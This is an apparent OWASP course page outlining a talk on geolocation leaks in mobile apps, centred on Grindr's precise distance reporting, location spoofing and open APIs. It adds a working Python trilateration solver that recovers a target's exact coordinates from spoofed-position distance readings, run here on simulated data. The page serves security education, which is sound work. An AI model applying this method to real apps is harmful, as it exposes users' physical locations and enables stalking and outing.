Overview
Syllabus
Intro
GEOLOCATION IN MOBILE APPS: incorporating geolocation is the norm
HOW IS GEOLOCATION ACCOMPLISHED (iOS)? Using the Core Location framework's location manager (CLLocationManager)
GEOLOCATION (iOS) OS-LEVEL PROTECTIONS: OS-level alerts (the location-permission prompt)
GEO CAN 'LEAK' IF THE APPLICATION IS BUGGY: ... bad for users!
THEY KNOW YOUR LOCATION
COMMON CLASSES OF GEO BUGS: bugs that can compromise a user's physical location
  INSECURE NETWORK COMMS
  OVER-PRECISE LOCATION
  USER INTERFACE
EXAMPLES OF GEO BUGS: buggy apps that compromised users' physical location
  STARBUCKS: overpriced coffee, plus a shot of geo tracking
  WHISPER: "the safest place on the internet" - NOPE
  TINDER: precise geo of nearby users allowed tracking
  ANGRY BIRDS: ... they are watching you play
GRINDR'S PREVIOUS ISSUES: those who cannot learn from history are doomed to repeat it
  LACK OF SSL PINNING: the app does not pin its certificates
  REPORTING OF PRECISE GEO
  LOCATION SPOOFING: you can spoof your location as much as you want
  WIDE-OPEN APIs: unauthenticated, unlimited access to the APIs
  'BROKEN' UI-LEVEL LOGIC: what you see/say isn't what you get
DISCLAIMER: our goal was to help Grindr understand the issues
TRILATERATION: determine absolute location from relative distances
USER LOCATION: so let's map some users
IDENTIFYING USERS: it'd be trivial to reveal anonymous users' identities
GRINDR RESPONSE: fixes & current issues
QUESTIONS & ANSWERS: feel free to contact us any time!
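The TRILATERATION and USER LOCATION slides describe recovering a user's absolute position from the relative distances an app reports. The following is an added worked example written for this page; it is not code from the talk, from OWASP or from Grindr. It assumes an attacker who can set their own position (the LOCATION SPOOFING issue), query an unauthenticated distance-to-user API from several spoofed positions, and read back an exact distance in metres. The target coordinates, the spoofed positions, the function names and the equirectangular local projection are all the example's own assumptions; the distances are fabricated with the haversine formula rather than fetched from any service. The solver goes slightly beyond the slide: it accepts any number of readings (three or more) and solves by least squares, so extra, slightly noisy readings only improve the fix.

```python
import math

EARTH_RADIUS_M = 6_371_000.0  # mean Earth radius in metres


def to_local_metres(lat, lon, ref_lat, ref_lon):
    """Project (lat, lon) onto a flat east/north plane, in metres, around a reference point.

    Over the few kilometres a proximity feature reports, the equirectangular approximation
    is accurate to well under a metre, which is all trilateration needs (assumed projection).
    """
    east = math.radians(lon - ref_lon) * EARTH_RADIUS_M * math.cos(math.radians(ref_lat))
    north = math.radians(lat - ref_lat) * EARTH_RADIUS_M
    return east, north


def from_local_metres(east, north, ref_lat, ref_lon):
    """Inverse of to_local_metres."""
    lat = ref_lat + math.degrees(north / EARTH_RADIUS_M)
    lon = ref_lon + math.degrees(east / (EARTH_RADIUS_M * math.cos(math.radians(ref_lat))))
    return lat, lon


def haversine_m(lat1, lon1, lat2, lon2):
    """Great-circle distance in metres. Used here only to fabricate the distance an app would report."""
    p1, p2 = math.radians(lat1), math.radians(lat2)
    a = (math.sin((p2 - p1) / 2) ** 2
         + math.cos(p1) * math.cos(p2) * math.sin(math.radians(lon2 - lon1) / 2) ** 2)
    return 2 * EARTH_RADIUS_M * math.asin(math.sqrt(a))


def trilaterate(readings):
    """readings: list of ((lat, lon), distance_m), one per spoofed position; needs at least three.

    Each reading is a circle (x - xi)^2 + (y - yi)^2 = ri^2 around the spoofed position.
    Subtracting the first circle from every other one cancels the unknown x^2 + y^2 terms,
    leaving one linear equation per extra reading:
        2(xi - x0) x + 2(yi - y0) y = r0^2 - ri^2 + xi^2 - x0^2 + yi^2 - y0^2
    which is solved by least squares (normal equations of a 2-column system).
    """
    if len(readings) < 3:
        raise ValueError("need at least three distance readings")
    (ref_lat, ref_lon), _ = readings[0]
    pts = [(to_local_metres(lat, lon, ref_lat, ref_lon), d) for (lat, lon), d in readings]
    (x0, y0), r0 = pts[0]
    a11 = a12 = a22 = b1 = b2 = 0.0  # accumulate A^T A and A^T b
    for (xi, yi), ri in pts[1:]:
        ax, ay = 2 * (xi - x0), 2 * (yi - y0)
        b = r0 ** 2 - ri ** 2 + xi ** 2 - x0 ** 2 + yi ** 2 - y0 ** 2
        a11 += ax * ax
        a12 += ax * ay
        a22 += ay * ay
        b1 += ax * b
        b2 += ay * b
    det = a11 * a22 - a12 * a12
    if abs(det) < 1e-9:
        # All spoofed positions lie on one line: the circles intersect symmetrically
        # on both sides of it and the position is ambiguous. Move one anchor off the line.
        raise ValueError("spoofed positions are collinear; add a reading off the line")
    x = (a22 * b1 - a12 * b2) / det
    y = (a11 * b2 - a12 * b1) / det
    return from_local_metres(x, y, ref_lat, ref_lon)


def simulate_attack(target_lat, target_lon, spoofed_positions):
    """Spoof to each position, 'read' the reported distance to the target, then trilaterate.

    Returns the recovered (lat, lon) and its error in metres against the constructed target.
    """
    readings = [((lat, lon), haversine_m(lat, lon, target_lat, target_lon))
                for lat, lon in spoofed_positions]
    est_lat, est_lon = trilaterate(readings)
    return (est_lat, est_lon), haversine_m(est_lat, est_lon, target_lat, target_lon)


if __name__ == "__main__":
    # Constructed target and spoofed positions (roughly 1 km apart); not real users or data.
    target = (37.7749, -122.4194)
    spoofed = [(37.7849, -122.4194), (37.7749, -122.4094), (37.7649, -122.4294)]
    (lat, lon), err = simulate_attack(*target, spoofed)
    print(f"recovered {lat:.5f}, {lon:.5f} (error {err:.2f} m)")
```

Three readings are enough for an exact fix; the attack only needs the API to hand back a distance and to accept a caller-chosen position, which is exactly the combination of the REPORTING OF PRECISE GEO, LOCATION SPOOFING and WIDE-OPEN APIs issues listed above.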
Taught by
OWASP Foundation